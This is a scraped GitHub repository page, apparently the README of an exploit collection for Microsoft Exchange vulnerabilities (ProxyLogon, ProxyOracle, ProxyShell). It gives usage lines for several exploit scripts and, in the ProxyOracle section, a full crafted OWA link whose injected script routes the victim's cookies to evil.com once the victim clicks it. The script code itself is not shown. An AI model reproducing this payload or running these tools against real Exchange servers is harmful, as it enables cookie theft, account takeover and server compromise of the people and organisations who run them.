ProxyVulns

ProxyLogon

Usage: python3 26855.py 1.1.1.1

ProxyOracle

Once a victim clicks this link, evil.com will receive the cookies.

https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`X-AnonResource-Backend=@evil.com:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/any.skin`,{credentials:`include`});//

pip3 install pycryptodome

Usage: python3 31196.py 1.1.1.1 'cadata=xxx; cadataTTL=yyy; ...'

ProxyShell

pip3 install pypsrp

Usage: python3 34473.py 1.1.1.1

Usage: python3 31207.py 1.1.1.1 [Local File Path] [UNC Absolute Path]

Not working in some versions target(due to /@gmail.com path), maybe fix it later

Others

Cookie: securitytoken=foobar
/owa/calendar/foobar@exchange.local/foobar/owa14.aspx/.js

Reference

ProxyLogon Vulnerability Analysis(Chinese)

https://docs.microsoft.com/en-us/exchange/architecture/mailbox-servers/recreate-arbitration-mailboxes?view=exchserver-2019

ProxyOracle Vulnerability Analysis(Chinese)

https://github.com/mwielgoszewski/python-paddingoracle

ProxyShell Vulnerability Analysis(Chinese)

Name		Name	Last commit message	Last commit date
Latest commit History 14 Commits
img		img
26855.py		26855.py
31196.py		31196.py
31207.py		31207.py
34473.py		34473.py
README.md		README.md
users.txt		users.txt

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

img

img

26855.py

26855.py

31196.py

31196.py

31207.py

31207.py

34473.py

34473.py

README.md

README.md

users.txt

users.txt

Repository files navigation

ProxyVulns

ProxyLogon

ProxyOracle

ProxyShell

Others

Reference

About

Releases

Packages

Languages

hosch3n/ProxyVulns

Folders and files

Latest commit

History

Repository files navigation

ProxyVulns

ProxyLogon

ProxyOracle

ProxyShell

Others

Reference

About

Resources

Stars

Watchers

Forks

Languages